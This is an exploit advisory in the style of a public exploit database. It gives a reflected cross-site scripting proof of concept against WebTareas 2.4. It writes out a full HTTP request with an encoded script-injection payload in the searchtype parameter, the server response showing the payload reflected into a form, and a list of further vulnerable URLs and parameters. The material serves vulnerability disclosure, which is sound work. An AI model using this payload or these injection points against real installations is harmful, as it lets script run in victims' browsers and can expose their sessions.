# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Proof Of Concept
-----------------------------------------------------------------------------------------------------------------------
Param: searchtype
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 07:46:31 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11147
[...]
<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">
[...]
-----------------------------------------------------------------------------------------------------------------------
Other vulnerable url and params:
-----------------------------------------------------------------------------------------------------------------------
/webtareas/administration/print_layout.php [doc_type]
/webtareas/general/login.php [logout]
/webtareas/general/login.php [session]
/webtareas/general/newnotifications.php [msg]
/webtareas/general/search.php [searchtype]
/webtareas/administration/print_layout.php [doc_type]